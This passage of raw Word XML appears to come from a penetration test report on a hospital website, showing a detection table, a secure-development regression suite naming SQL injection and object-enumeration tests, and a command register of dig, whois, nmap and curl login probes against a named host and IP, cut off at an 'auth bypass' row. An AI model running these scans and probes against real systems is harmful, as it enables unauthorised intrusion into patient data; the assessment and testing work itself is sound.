            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Directory enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Alert on repeated requests to /old/, /patient/, /staff/ and common index files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Block and inspect reconnaissance pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>28. Secure SDLC Regression Suite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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Expected result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Invalid credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP 401/generic failure; no authenticated session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Quote/comment SQLi payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Generic failure; no redirect; no database error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Boolean true/false variants</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No authentication-state change</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Known backup filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP 404/403; no data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Directory listing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Disabled on sensitive directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Known patient report ID for another user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP 403; no content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Direct log filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP 403/404</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sequential object enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No cross-user object disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Malformed request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No stack trace or database implementation detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>29. Command Register — Reproducibility Appendix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The register below records commands supported by the captured terminal artifacts and the assessment evidence. Session cookies and other live credentials are intentionally redacted. The register is an audit index; it does not invent terminal timestamps where the source evidence did not capture them.</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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Executed command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DNS resolution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dig @1.1.1.1 medirozahospital.com A +short</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>199.188.201.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DNS resolution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dig @8.8.8.8 medirozahospital.com A +short</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>199.188.201.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>curl -k -I https://medirozahospital.com/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP/2 200; Server: LiteSpeed; 5,445-byte HTML response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Robots policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>curl -k -sS https://medirozahospital.com/robots.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Disallowed /patient/, /staff/, /old/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sitemap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>curl -k -sS https://medirozahospital.com/sitemap.xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public pages listed; restricted areas omitted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Patient login discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>curl -k -sS https://medirozahospital.com/patient/login.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Login form; POST username/password fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>WHOIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>whois medirozahospital.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>NameCheap; created 2026-08-14; privacy protected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Full TCP scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sudo nmap -Pn -p- --min-rate 1000 199.188.201.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>First run observed 13 open ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Service scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sudo nmap -Pn -sV -sC -p21,25,53,80,110,143,443,465,587,993,995,2077,2091 199.188.201.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FTP/SMTP/DNS/HTTP/IMAP/POP3/cPanel-related services observed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Authentication baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>curl -k -sS -o /tmp/a.html -w "status=%{http_code} size=%{size_download} redirect=%{redirect_url}\n" -X POST "https://medirozahospital.com/patient/login.php" --data-urlencode "username=admin" --data-urlencode "password=wrongpassword123"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP 200; 2,281 bytes; no redirect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Manual SQLi/auth bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
